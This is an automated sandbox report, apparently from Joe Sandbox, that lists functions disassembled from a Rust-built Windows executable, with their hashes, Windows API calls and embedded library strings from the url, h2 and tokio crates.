API String ID: 3510742995-1082630576
Opcode ID: fd696f8b28372cf358e084e5256b195eeac5139d8d1246e25c3745721f9982e7
Instruction ID: a72660883e42c93ff42dcca0f95f40bbcc2e75d148cfce2c7a3670354633fe3f
Opcode Fuzzy Hash: fd696f8b28372cf358e084e5256b195eeac5139d8d1246e25c3745721f9982e7
Instruction Fuzzy Hash: 44123476608BC18AE7719B14E4503EAB7A0FB89794F904066DBCC43B9ADF7CD199CB10

Function 00007FF71A857A85 Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A857C80

Strings

//file://, xrefs: 00007FF71A857B3C
assertion failed: !self.serialization[scheme_end_as_usize..].starts_with("://"), xrefs: 00007FF71A857CEA, 00007FF71A857FFB
:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs, xrefs: 00007FF71A857CB3, 00007FF71A857EC5
:/., xrefs: 00007FF71A857BD9
assertion failed: self.is_char_boundary(n), xrefs: 00007FF71A857C41, 00007FF71A85800E
assertion failed: self.is_char_boundary(idx), xrefs: 00007FF71A857B75

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: //file://$:/.$:///home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/url-2.5.0/src/parser.rs$assertion failed: !self.serialization[scheme_end_as_usize..].starts_with("://")$assertion failed: self.is_char_boundary(idx)$assertion failed: self.is_char_boundary(n)
API String ID: 3510742995-1936055137
Opcode ID: 7fddd0a2bf4640576e08de3d0d176cf470f0fea184d42d0e965c7c21cc44d57e
Instruction ID: 9a532cd357487c153786a9b53d106ca44a6292ab2812c027d01ddedd7c2dd084
Opcode Fuzzy Hash: 7fddd0a2bf4640576e08de3d0d176cf470f0fea184d42d0e965c7c21cc44d57e
Instruction Fuzzy Hash: 4BF18F62A08B8196EB12FB11E4442AAF770FB49BA4F804477EE8D03B55DF3CE569C710

Function 00007FF71A8437A0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF71A843919
GetEnvironmentVariableW.KERNEL32 ref: 00007FF71A84392B
GetLastError.KERNEL32 ref: 00007FF71A843937
GetLastError.KERNEL32 ref: 00007FF71A843950

Strings

internal error: entered unreachable codemid > len, xrefs: 00007FF71A843AAF

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLast$EnvironmentVariable
String ID: internal error: entered unreachable codemid > len
API String ID: 2691138088-2258328430
Opcode ID: 99b3d555136728d2b9a80d6cad5f7a918c852b0bf213e167f84a7214bfc2509b
Instruction ID: ed4f5a55499506f214fa47b42f0c89f000c6268bdb5aca8b6f1d6b0a010674c9
Opcode Fuzzy Hash: 99b3d555136728d2b9a80d6cad5f7a918c852b0bf213e167f84a7214bfc2509b
Instruction Fuzzy Hash: 3491B062A04F8649FB26AE21D8493F9E354FB44BA8F844176CF5D1B785CF3CD6998320

Function 00007FF71A8454F0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

FreeAddrInfoW.WS2_32 ref: 00007FF71A845757
FreeAddrInfoW.WS2_32 ref: 00007FF71A84581F

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF71A8457AC, 00007FF71A8457F2
assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF71A845625, 00007FF71A8457DD
, xrefs: 00007FF71A845724

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: AddrFreeInfo
String ID: $assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 3780557530-2757504381
Opcode ID: aef8258499686c2091064c0ceaa1db99f0bb354569fb63fcaa378d05e82e2aba
Instruction ID: 7593a94d6234ace46967410dd1b41f012d6ba903fbf97d3622130e9ada6c8d0f
Opcode Fuzzy Hash: aef8258499686c2091064c0ceaa1db99f0bb354569fb63fcaa378d05e82e2aba
Instruction Fuzzy Hash: CEA19D72A04A51CAF719EF21D4406ADBBB1FB88B64F95803ACE0D43B94DF38D959C760

Function 00007FF71A823550 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32 ref: 00007FF71A823566
QueryPerformanceFrequency.KERNEL32 ref: 00007FF71A82358E
GetLastError.KERNEL32 ref: 00007FF71A823624
GetLastError.KERNEL32 ref: 00007FF71A82365F

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A823641, 00007FF71A82367C

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorLastPerformanceQuery$CounterFrequency
String ID: called `Result::unwrap()` on an `Err` value
API String ID: 2984914903-2333694755
Opcode ID: 36da2e6101111a600268ef61ff68cd1b9bccb5635c7a8a57596443dfe861ad14
Instruction ID: fb4666fa92d95ed4104b7b749f7dea75f20f769803df68bc8f5a0a78c5a597b9
Opcode Fuzzy Hash: 36da2e6101111a600268ef61ff68cd1b9bccb5635c7a8a57596443dfe861ad14
Instruction Fuzzy Hash: D131C261B09F4656FB06BB6198153B9E366AF847A4F8485B3DC0E07795DE2CA22DC320

Function 00007FF71A7F1DD1 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 408COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7F219C
memcpy.MSVCRT ref: 00007FF71A7F21B4
memcpy.MSVCRT ref: 00007FF71A7F2206

Strings

PRI * HTTP/2.0SM, xrefs: 00007FF71A7F222D

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: PRI * HTTP/2.0SM
API String ID: 3510742995-1997477056
Opcode ID: 036492a1f8280a470d712cbdebeb994a49540112b561d17f373ac61e4f69e52b
Instruction ID: 87877c809a3cdd656eb600141b442899eed57ab8bf1e67037a96dd0fc2e1fecb
Opcode Fuzzy Hash: 036492a1f8280a470d712cbdebeb994a49540112b561d17f373ac61e4f69e52b
Instruction Fuzzy Hash: E4328732608BC88AE3A2CF14E5447EEB3A8FB48754F414226EB9C47795DF38D699C710

Function 00007FF71A7FFF9C Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 294COMMON

Download Yara Rule

Strings

, xrefs: 00007FF71A800699

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 8f87efd90b42e2fa175b9ea960ddfe188d8b8a6d45a6f1f64f61315f33a8427a
Instruction ID: 5f05a29da4a0fbd5537aeb77e7e33ac0c1c4d5e6ab689facd948589c45868746
Opcode Fuzzy Hash: 8f87efd90b42e2fa175b9ea960ddfe188d8b8a6d45a6f1f64f61315f33a8427a
Instruction Fuzzy Hash: C1E1672260CBC089E771AB14E4513EAE7A0FB997A4F844136DBC943B9ADF7CD158CB10

Function 00007FF71A7E73E8 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7E744A
memcpy.MSVCRT ref: 00007FF71A7E74AA
memcpy.MSVCRT ref: 00007FF71A7E74EC

Strings

invalid key, xrefs: 00007FF71A7E74F1
assertion failed: slot.next.is_none(), xrefs: 00007FF71A7E7509

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: slot.next.is_none()$invalid key
API String ID: 3510742995-195781097
Opcode ID: c4865feea41da582d4a0ad7a4561813723ed851027faf8fc1343614b94df602a
Instruction ID: de71863d57e21627f168c69653e8f89783334cea7e6b0a5b9573e79182d467bf
Opcode Fuzzy Hash: c4865feea41da582d4a0ad7a4561813723ed851027faf8fc1343614b94df602a
Instruction Fuzzy Hash: 5731AE62619F5680F711AF01E8457A9FBA4EB587A4F854072EE5C06395DF3CD299C310

Function 00007FF71A8236E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32 ref: 00007FF71A82370D
GetLastError.KERNEL32 ref: 00007FF71A82389B

Strings

overflow when subtracting durations, xrefs: 00007FF71A823851
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A8238B8

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ErrorFrequencyLastPerformanceQuery
String ID: called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
API String ID: 3362413890-1633623230
Opcode ID: 68bcbc8a747c15da249fd3749a2c230639f94644f5b9c4b602472c525d9dca89
Instruction ID: 98031e6bc6ba664a204a45e99da2229bd15fe0312ec333526db4943f9672ca4f
Opcode Fuzzy Hash: 68bcbc8a747c15da249fd3749a2c230639f94644f5b9c4b602472c525d9dca89
Instruction Fuzzy Hash: 38513525F18F9655FF16EB649814BB9A3A1EF447A4FC48077DD0E06B84DE3CA62DC210

Function 00007FF71A85742A Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 413COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A857A25

Strings

..., xrefs: 00007FF71A8578A3
%2e%2e%2e%2E%2E%2e%2E%2E%2e.%2E..%2e.%2E%2e%2E, xrefs: 00007FF71A857665
assertion failed: self.is_char_boundary(at), xrefs: 00007FF71A8579D6

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: %2e%2e%2e%2E%2E%2e%2E%2E%2e.%2E..%2e.%2E%2e%2E$...$assertion failed: self.is_char_boundary(at)
API String ID: 3510742995-3370502713
Opcode ID: 0e5834a28651a47ec7cef9927bb35ec6add74a2ae0405a0ca4a0b7223e0e0a41
Instruction ID: d344dcbe3e191d605f86361628a39e50ed248637594e70177beced5018d44be7
Opcode Fuzzy Hash: 0e5834a28651a47ec7cef9927bb35ec6add74a2ae0405a0ca4a0b7223e0e0a41
Instruction Fuzzy Hash: 70F19351A08E4242FF66BB22A4002B9E771BF45BE4F8484B7DD9D17B95CE3CE569C320

Function 00007FF71A7DB335 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7DB708
memcpy.MSVCRT ref: 00007FF71A7DBCCB

Part of subcall function 00007FF71A7AA76B: memcpy.MSVCRT ref: 00007FF71A7AA799

Strings

User-Agent: Proxy-Authorization: , xrefs: 00007FF71A7DB8DD

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: User-Agent: Proxy-Authorization:
API String ID: 3510742995-2999785893
Opcode ID: e7324ca3d32987450859dd1dcf19cccfa9f0070ac42184a5acf4efe8fa37d735
Instruction ID: 00a86fb26b7b3fa07e526ea7e4eef64e35ac85cde97d88278b218279471f9956
Opcode Fuzzy Hash: e7324ca3d32987450859dd1dcf19cccfa9f0070ac42184a5acf4efe8fa37d735
Instruction Fuzzy Hash: 20E14962908FC180F751EF24E4453EA6764FB99B58F885176DE8C0B29ADF78D29CC321

Function 00007FF71A7FFAE5 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 192COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A8001D9

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A8060D8, 00007FF71A8062C1
assertion failed: self.remote.is_none()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/proto/settings.rs, xrefs: 00007FF71A805E28

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: self.remote.is_none()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/h2-0.3.24/src/proto/settings.rs$called `Result::unwrap()` on an `Err` value
API String ID: 3510742995-4259729860
Opcode ID: 5ecf74400a5fc2b056764a77dd5a3b95d428bf3479c77432a750ed4e4e05e699
Instruction ID: 10a3aee84199b76199bde0cb8335127b994e4276090e72a68a4ddb08fe137a0c
Opcode Fuzzy Hash: 5ecf74400a5fc2b056764a77dd5a3b95d428bf3479c77432a750ed4e4e05e699
Instruction Fuzzy Hash: F4B1323660DBC18AE3329B54A4503EAFBA4F799750F804066DACC53B59DB3CD258CF20

Function 00007FF71A7DD369 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71A7C9371: memcpy.MSVCRT ref: 00007FF71A7C9420

Part of subcall function 00007FF71A7C9438: memcpy.MSVCRT ref: 00007FF71A7C953D

memcpy.MSVCRT ref: 00007FF71A7DD4E2
memcpy.MSVCRT ref: 00007FF71A7DD540

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7DD59A
scheme and authority is valid Uri, xrefs: 00007FF71A7DD5CF

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: called `Result::unwrap()` on an `Err` value$scheme and authority is valid Uri
API String ID: 3510742995-1220905182
Opcode ID: e5b837c718ab1e0187bd76501668d7f0adfad1d0585fdce0d91f0cc734ae3ee7
Instruction ID: 35a9671c09a0b37f8d7a8eeff11726cbdb9caa3305dda20f0b498f1a0f0f8d96
Opcode Fuzzy Hash: e5b837c718ab1e0187bd76501668d7f0adfad1d0585fdce0d91f0cc734ae3ee7
Instruction Fuzzy Hash: AE616122A1DEC291F721AB54E0113EAFB60EB99764F844062DBCD13A5ADF7CD29DC710

Function 00007FF71A7D5E46 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 105COMMON

Download Yara Rule

Strings

assertion failed: self.inner.semaphore.is_idle()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-1.36.0/src/sync/mpsc/chan.rs, xrefs: 00007FF71A7D5F33, 00007FF71A7D5FCA
connection closed, xrefs: 00007FF71A7D6069

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID:
String ID: assertion failed: self.inner.semaphore.is_idle()/home/airevan/.cargo/registry/src/mirrors.ustc.edu.cn-4affec411d11e50f/tokio-1.36.0/src/sync/mpsc/chan.rs$connection closed
API String ID: 0-3713214761
Opcode ID: f3a5c731c006a358b9f174e7d4dd913e420b50a4da7d32493c2f15c1bb6e881c
Instruction ID: b7684dd9f9eb1b3cb59cab39fec9ef5a53658208a88ecd2b1abe9711d57e659a
Opcode Fuzzy Hash: f3a5c731c006a358b9f174e7d4dd913e420b50a4da7d32493c2f15c1bb6e881c
Instruction Fuzzy Hash: C3416072B08A4252FB16AE2594157F99651FB497B8FC44473EE4D0B295CF3CD68EC320

Function 00007FF71A821F00 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF71A821F94
WriteConsoleW.KERNEL32 ref: 00007FF71A821FD3
WriteConsoleW.KERNEL32 ref: 00007FF71A82203A
GetLastError.KERNEL32 ref: 00007FF71A822043
GetLastError.KERNEL32 ref: 00007FF71A8220AE

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: ConsoleErrorLastWrite$ByteCharMultiWide
String ID:
API String ID: 1956605914-0
Opcode ID: b5d42ead7e69e10bd585d4231131c02bede2e5f35bcca0d4bc676abac4e54aa7
Instruction ID: 36c9c562d270531345b0f9c975c0aa730b627427162ad013d50a48dd6164b69c
Opcode Fuzzy Hash: b5d42ead7e69e10bd585d4231131c02bede2e5f35bcca0d4bc676abac4e54aa7
Instruction Fuzzy Hash: 1F41E661E08AA246F7366650C8087F9D651FB043B4F844273EA8D47BC9FF7CD569C220

Function 00007FF71A7BDB62 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71A7BDA98), ref: 00007FF71A84A530
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71A7BDA98), ref: 00007FF71A84A59A
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF71A7BDA98), ref: 00007FF71A84A5A7

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: fd07a03da2fca46eadde4b9de248192e19d8364d25695feb229207d59d8b3d94
Instruction ID: 4e0e684a624f7371b105d987e46b605fb20109b52336f1dfe9a24be15a190211
Opcode Fuzzy Hash: fd07a03da2fca46eadde4b9de248192e19d8364d25695feb229207d59d8b3d94
Instruction Fuzzy Hash: 1721D472B08E0146FB127B5196003B8D361BF49BA0FC541B2DE5D1B795DE2DA9698350

Function 00007FF71A7BB34E Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF71A7BB398
memcpy.MSVCRT ref: 00007FF71A7BB3C4
memcpy.MSVCRT ref: 00007FF71A7BB41E

Strings

invalid key, xrefs: 00007FF71A7BB423

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: memcpy
String ID: invalid key
API String ID: 3510742995-3396617187
Opcode ID: b4d1b7904d7ccca162cf8eec577f31fc8eaad3fc3f68a475d286f4db4c560adf
Instruction ID: faae9ae6bf575ab55f17ed78a246b99eac4e0f7c96bae1dcfdd99112cd0e8c0d
Opcode Fuzzy Hash: b4d1b7904d7ccca162cf8eec577f31fc8eaad3fc3f68a475d286f4db4c560adf
Instruction Fuzzy Hash: DE219F72608A5291EB21EB11E455BEDA760F7497A4FC48472DE4C07685CF3CD65EC710

Function 00007FF71A7C8043 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-0000006C,?), ref: 00007FF71A7C807B

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF71A7C81A9
assertion failed: (*tail).value.is_none(), xrefs: 00007FF71A7C8160

Memory Dump Source

Source File: 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF71A7A0000, based on PE: true

Associated: 00000000.00000002.2905937687.00007FF71A7A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8E4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2905951421.00007FF71A8EB000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff71a7a0000_31#U544a.jbxd

Similarity

API ID: SwitchThread
String ID: assertion failed: (*tail).value.is_none()$called `Result::unwrap()` on an `Err` value
API String ID: 115865932-4033815473
Opcode ID: 05196a796e55bf4fb9810b0ed2e8d490483fb92f32423ee54cc44c26c3460d3b
Instruction ID: e6dc138b9cb63958789d7d547bb128c820ce6c016877f21d6269df33d7adb717
Opcode Fuzzy Hash: 05196a796e55bf4fb9810b0ed2e8d490483fb92f32423ee54cc44c26c3460d3b
Instruction Fuzzy Hash: 27416022A19E8781F712AF14D4413B9E3A0EF58770F8541B6DE8D03296EF7CE69D8360

